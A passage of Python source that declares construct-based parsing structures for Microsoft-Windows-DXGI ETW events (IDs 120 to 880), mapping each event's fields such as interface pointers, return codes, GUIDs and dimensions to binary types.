pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=120, version=0)
class Microsoft_Windows_DXGI_120_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=121, version=0)
class Microsoft_Windows_DXGI_121_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=122, version=0)
class Microsoft_Windows_DXGI_122_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pUMDVersion" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=123, version=0)
class Microsoft_Windows_DXGI_123_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=124, version=0)
class Microsoft_Windows_DXGI_124_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"riid" / Guid,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=125, version=0)
class Microsoft_Windows_DXGI_125_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=126, version=0)
class Microsoft_Windows_DXGI_126_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=127, version=0)
class Microsoft_Windows_DXGI_127_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=128, version=0)
class Microsoft_Windows_DXGI_128_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=129, version=0)
class Microsoft_Windows_DXGI_129_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=130, version=0)
class Microsoft_Windows_DXGI_130_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"uiDataSize" / Int32ul,
"pData" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=131, version=0)
class Microsoft_Windows_DXGI_131_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=132, version=0)
class Microsoft_Windows_DXGI_132_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pInterface" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=133, version=0)
class Microsoft_Windows_DXGI_133_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=134, version=0)
class Microsoft_Windows_DXGI_134_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pDataSize" / Int32ul,
"pData" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=135, version=0)
class Microsoft_Windows_DXGI_135_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul,
"pDataSize" / Int32ul,
"pData" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=136, version=0)
class Microsoft_Windows_DXGI_136_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"riid" / Guid,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=137, version=0)
class Microsoft_Windows_DXGI_137_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=138, version=0)
class Microsoft_Windows_DXGI_138_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=139, version=0)
class Microsoft_Windows_DXGI_139_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=140, version=0)
class Microsoft_Windows_DXGI_140_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"EnumFormat" / Int32ul,
"dwFlags" / Int32ul,
"pNumModes" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=141, version=0)
class Microsoft_Windows_DXGI_141_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=142, version=0)
class Microsoft_Windows_DXGI_142_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pConcernedDevice" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=143, version=0)
class Microsoft_Windows_DXGI_143_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=144, version=0)
class Microsoft_Windows_DXGI_144_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=145, version=0)
class Microsoft_Windows_DXGI_145_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=146, version=0)
class Microsoft_Windows_DXGI_146_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pDevice" / Int64ul,
"bExclusive" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=147, version=0)
class Microsoft_Windows_DXGI_147_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=148, version=0)
class Microsoft_Windows_DXGI_148_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=150, version=0)
class Microsoft_Windows_DXGI_150_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pGammaCaps" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=151, version=0)
class Microsoft_Windows_DXGI_151_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=152, version=0)
class Microsoft_Windows_DXGI_152_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=153, version=0)
class Microsoft_Windows_DXGI_153_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=154, version=0)
class Microsoft_Windows_DXGI_154_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=155, version=0)
class Microsoft_Windows_DXGI_155_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=156, version=0)
class Microsoft_Windows_DXGI_156_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pScanoutSurface" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=157, version=0)
class Microsoft_Windows_DXGI_157_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=158, version=0)
class Microsoft_Windows_DXGI_158_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pScanoutSurface" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=159, version=0)
class Microsoft_Windows_DXGI_159_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=160, version=0)
class Microsoft_Windows_DXGI_160_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=161, version=0)
class Microsoft_Windows_DXGI_161_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=162, version=0)
class Microsoft_Windows_DXGI_162_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"riid" / Guid,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=163, version=0)
class Microsoft_Windows_DXGI_163_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=164, version=0)
class Microsoft_Windows_DXGI_164_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=165, version=0)
class Microsoft_Windows_DXGI_165_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=166, version=0)
class Microsoft_Windows_DXGI_166_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=167, version=0)
class Microsoft_Windows_DXGI_167_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=168, version=0)
class Microsoft_Windows_DXGI_168_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"uiDataSize" / Int32ul,
"pData" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=169, version=0)
class Microsoft_Windows_DXGI_169_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=170, version=0)
class Microsoft_Windows_DXGI_170_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pInterface" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=171, version=0)
class Microsoft_Windows_DXGI_171_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=172, version=0)
class Microsoft_Windows_DXGI_172_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pDataSize" / Int32ul,
"pData" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=173, version=0)
class Microsoft_Windows_DXGI_173_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul,
"pDataSize" / Int32ul,
"pData" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=174, version=0)
class Microsoft_Windows_DXGI_174_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"riid" / Guid,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=175, version=0)
class Microsoft_Windows_DXGI_175_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=176, version=0)
class Microsoft_Windows_DXGI_176_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"riid" / Guid,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=177, version=0)
class Microsoft_Windows_DXGI_177_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=178, version=0)
class Microsoft_Windows_DXGI_178_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"SyncInterval" / Int32ul,
"dwFlags" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=179, version=0)
class Microsoft_Windows_DXGI_179_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=180, version=0)
class Microsoft_Windows_DXGI_180_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"iBuffer" / Int32ul,
"Interface" / Guid,
"ppSurface" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=181, version=0)
class Microsoft_Windows_DXGI_181_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=182, version=0)
class Microsoft_Windows_DXGI_182_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"bFullscreen" / Int32ul,
"pTarget" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=183, version=0)
class Microsoft_Windows_DXGI_183_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=184, version=0)
class Microsoft_Windows_DXGI_184_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pbFullscreen" / Int32ul,
"ppTarget" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=185, version=0)
class Microsoft_Windows_DXGI_185_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=186, version=0)
class Microsoft_Windows_DXGI_186_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=187, version=0)
class Microsoft_Windows_DXGI_187_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=188, version=0)
class Microsoft_Windows_DXGI_188_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"BufferCount" / Int32ul,
"Width" / Int32ul,
"Height" / Int32ul,
"NewFormat" / Int32ul,
"SwapChainFalgs" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=189, version=0)
class Microsoft_Windows_DXGI_189_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=190, version=0)
class Microsoft_Windows_DXGI_190_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=191, version=0)
class Microsoft_Windows_DXGI_191_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=192, version=0)
class Microsoft_Windows_DXGI_192_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"ppOutput" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=193, version=0)
class Microsoft_Windows_DXGI_193_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=194, version=0)
class Microsoft_Windows_DXGI_194_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=195, version=0)
class Microsoft_Windows_DXGI_195_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=196, version=0)
class Microsoft_Windows_DXGI_196_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pLastPresentCount" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=197, version=0)
class Microsoft_Windows_DXGI_197_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=198, version=0)
class Microsoft_Windows_DXGI_198_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"riid" / Guid,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=199, version=0)
class Microsoft_Windows_DXGI_199_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=200, version=0)
class Microsoft_Windows_DXGI_200_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=201, version=0)
class Microsoft_Windows_DXGI_201_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=202, version=0)
class Microsoft_Windows_DXGI_202_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=203, version=0)
class Microsoft_Windows_DXGI_203_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=204, version=0)
class Microsoft_Windows_DXGI_204_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"uiDataSize" / Int32ul,
"pData" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=205, version=0)
class Microsoft_Windows_DXGI_205_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=206, version=0)
class Microsoft_Windows_DXGI_206_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pInterface" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=207, version=0)
class Microsoft_Windows_DXGI_207_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=208, version=0)
class Microsoft_Windows_DXGI_208_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pDataSize" / Int32ul,
"pData" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=209, version=0)
class Microsoft_Windows_DXGI_209_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul,
"pDataSize" / Int32ul,
"pData" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=210, version=0)
class Microsoft_Windows_DXGI_210_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"riid" / Guid,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=211, version=0)
class Microsoft_Windows_DXGI_211_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=212, version=0)
class Microsoft_Windows_DXGI_212_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"iAdapter" / Int32ul,
"ppAdapterInterface" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=213, version=0)
class Microsoft_Windows_DXGI_213_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=214, version=0)
class Microsoft_Windows_DXGI_214_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"hWnd" / Int64ul,
"Flags" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=215, version=0)
class Microsoft_Windows_DXGI_215_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=216, version=0)
class Microsoft_Windows_DXGI_216_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"phWnd" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=217, version=0)
class Microsoft_Windows_DXGI_217_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=218, version=0)
class Microsoft_Windows_DXGI_218_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pDevice" / Int64ul,
"ppSwapChain" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=219, version=0)
class Microsoft_Windows_DXGI_219_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=220, version=0)
class Microsoft_Windows_DXGI_220_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"hModule" / Int64ul,
"ppAdapter" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=221, version=0)
class Microsoft_Windows_DXGI_221_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=848, version=0)
class Microsoft_Windows_DXGI_848_0(Etw):
pattern = Struct(
"riid" / Guid,
"ppFactory" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=849, version=0)
class Microsoft_Windows_DXGI_849_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=850, version=0)
class Microsoft_Windows_DXGI_850_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"Width" / Int32ul,
"Height" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=851, version=0)
class Microsoft_Windows_DXGI_851_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=852, version=0)
class Microsoft_Windows_DXGI_852_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pWidth" / Int64ul,
"pHeight" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=853, version=0)
class Microsoft_Windows_DXGI_853_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=854, version=0)
class Microsoft_Windows_DXGI_854_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"BufferToPresent" / Int32ul,
"SyncInterval" / Int32ul,
"Flags" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=855, version=0)
class Microsoft_Windows_DXGI_855_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=856, version=0)
class Microsoft_Windows_DXGI_856_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"MaxLatency" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=857, version=0)
class Microsoft_Windows_DXGI_857_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=858, version=0)
class Microsoft_Windows_DXGI_858_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pMaxLatency" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=859, version=0)
class Microsoft_Windows_DXGI_859_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=860, version=0)
class Microsoft_Windows_DXGI_860_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=861, version=0)
class Microsoft_Windows_DXGI_861_0(Etw):
pattern = Struct(
"m_Ret" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=862, version=0)
class Microsoft_Windows_DXGI_862_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pRect" / Int64ul,
"Rect" / Int32sl
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=863, version=0)
class Microsoft_Windows_DXGI_863_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=864, version=0)
class Microsoft_Windows_DXGI_864_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pRect" / Int64ul,
"Rect" / Int32sl
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=865, version=0)
class Microsoft_Windows_DXGI_865_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=866, version=0)
class Microsoft_Windows_DXGI_866_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"Width" / Int32ul,
"Height" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=867, version=0)
class Microsoft_Windows_DXGI_867_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=868, version=0)
class Microsoft_Windows_DXGI_868_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pRect" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=869, version=0)
class Microsoft_Windows_DXGI_869_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=870, version=0)
class Microsoft_Windows_DXGI_870_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pRect" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=871, version=0)
class Microsoft_Windows_DXGI_871_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=872, version=0)
class Microsoft_Windows_DXGI_872_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pWidth" / Int64ul,
"pHeight" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=873, version=0)
class Microsoft_Windows_DXGI_873_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=874, version=0)
class Microsoft_Windows_DXGI_874_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"YCbCrFlags" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=875, version=0)
class Microsoft_Windows_DXGI_875_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=876, version=0)
class Microsoft_Windows_DXGI_876_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=877, version=0)
class Microsoft_Windows_DXGI_877_0(Etw):
pattern = Struct(
"YCbCrFlags" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=878, version=0)
class Microsoft_Windows_DXGI_878_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pMatrix" / Int64ul,
"Matrix" / Float32l
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=879, version=0)
class Microsoft_Windows_DXGI_879_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=880, version=0)
class Microsoft_Windows_DXGI_880_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pMatrix" / Int64ul
)
